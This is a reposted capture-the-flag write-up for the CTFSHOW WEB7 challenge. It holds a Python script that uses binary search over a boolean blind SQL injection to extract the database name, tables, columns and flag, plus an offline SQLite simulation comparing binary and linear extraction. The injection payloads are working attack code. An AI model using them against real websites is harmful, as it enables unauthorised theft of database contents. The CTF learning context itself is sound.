[SQL Blind Injection] CTFSHOW WEB7 (dumping data fast with binary search)

This challenge is a blind injection. As for why, you can read the other masters' writeups; I don't want to say much, I just want to record my script.
My payloads query the database name, the table names, the column names and dump the field respectively; uncomment them yourself and play with it.
Then change the first half of the URL to the URL of your own target instance.

```python
import requests

# Injection point: everything after "?id='/**/" is appended verbatim to the query.
# Replace the host with the URL of your own target instance.
url = "http://ef1aa69c-3250-414b-9468-0c03efbfbd6f.chall.ctf.show/?id='/**/"

result = ''
i = 0  # 1-based position of the character currently being extracted

while True:
    i = i + 1
    # Search window covering printable ASCII: [32, 127)
    head = 32
    tail = 127

    # Binary search: every request halves the window, so about 7 requests
    # per character instead of up to 95 with a linear scan.
    while head < tail:
        mid = (head + tail) >> 1
        # Uncomment one payload at a time: database name, table names, column names, flag.
        # payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)' % (i, mid)
        # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),{i},1))>{mid},1,0)'
        # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name="flag")),{i},1))>{mid},1,0)'
        payload = f'if(ascii(substr((select/**/(flag)from(flag)),{i},1))>{mid},1,0)'
        r = requests.get(url + payload)
        # Boolean oracle: the poem text is only rendered when the condition is true.
        if "By Rudyard Kipling" in r.text:
            head = mid + 1  # the character is greater than mid
        else:
            tail = mid      # the character is at most mid

    # Past the end of the string ascii(substr(...)) is 0, so the search settles on 32:
    # treat that as end of data (note that a literal space in the data would also stop here).
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)
```
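To show why the binary search pays off, here is an added offline illustration of the same boolean oracle (example code written for this page, not part of the original writeup). It assumes an in-memory SQLite database standing in for the challenge's MySQL backend, with SQLite's `unicode()` in place of MySQL's `ascii()`, a constructed `article` table whose row carries the "By Rudyard Kipling" marker, and a made-up flag value. The vulnerable query, the oracle and the request counter are all constructed for the demo; the binary-search loop is the one from the script above, with a linear scan beside it for comparison.

```python
import sqlite3

# Constructed stand-in for the challenge backend: an in-memory SQLite database
# instead of the real MySQL target (assumption), with SQLite's unicode() playing
# the role of MySQL's ascii(). The flag value is made up for the demo.
SECRET_FLAG = "ctfshow{demo_flag_not_real}"
POEM_MARKER = "By Rudyard Kipling"


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (id INTEGER, title TEXT)")
    db.execute("INSERT INTO article VALUES (1, ?)", ("If-- " + POEM_MARKER,))
    db.execute("CREATE TABLE flag (flag TEXT)")
    db.execute("INSERT INTO flag VALUES (?)", (SECRET_FLAG,))
    return db


class BlindOracle:
    """Simulated vulnerable page: the id parameter is concatenated into the SQL."""

    def __init__(self, db: sqlite3.Connection):
        self.db = db
        self.queries = 0  # how many requests the attacker had to send

    def page_shows_poem(self, user_id: str) -> bool:
        self.queries += 1
        sql = f"SELECT title FROM article WHERE id = {user_id}"  # vulnerable: unparameterised
        rows = self.db.execute(sql).fetchall()
        return any(POEM_MARKER in title for (title,) in rows)


def blind_extract_binary(oracle: BlindOracle, subquery: str) -> str:
    """Recover subquery's result one character at a time by binary search over [32, 127)."""
    result = ""
    pos = 0
    while True:
        pos += 1
        head, tail = 32, 127
        while head < tail:
            mid = (head + tail) >> 1
            cond = f"unicode(substr(({subquery}),{pos},1))>{mid}"
            if oracle.page_shows_poem(f"1 AND ({cond})"):
                head = mid + 1  # character is greater than mid
            else:
                tail = mid      # character is at most mid
        # Past the end of the string substr() yields '' and unicode('') is NULL,
        # so every comparison is false and the search settles on 32: stop there.
        if head == 32:
            return result
        result += chr(head)


def blind_extract_linear(oracle: BlindOracle, subquery: str) -> str:
    """Same oracle, but trying every candidate code point in turn (for comparison)."""
    result = ""
    pos = 0
    while True:
        pos += 1
        for code in range(33, 127):
            cond = f"unicode(substr(({subquery}),{pos},1))={code}"
            if oracle.page_shows_poem(f"1 AND ({cond})"):
                result += chr(code)
                break
        else:
            return result  # no candidate matched: end of string


if __name__ == "__main__":
    fast = BlindOracle(make_db())
    print(blind_extract_binary(fast, "SELECT flag FROM flag"), fast.queries, "queries")
    slow = BlindOracle(make_db())
    print(blind_extract_linear(slow, "SELECT flag FROM flag"), slow.queries, "queries")
```

Each character costs at most 7 oracle queries with the binary search (the window of 95 code points halves every round), against up to 94 for the linear scan, and the end of the string costs one full search either way. Both variants share the script's caveat that a space (code 32) is indistinguishable from end of data; if the target value may contain spaces, widen the window to start at 31 or binary-search `length()` of the value first and stop at that count.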


Reposted from blog.csdn.net/solitudi/article/details/107810619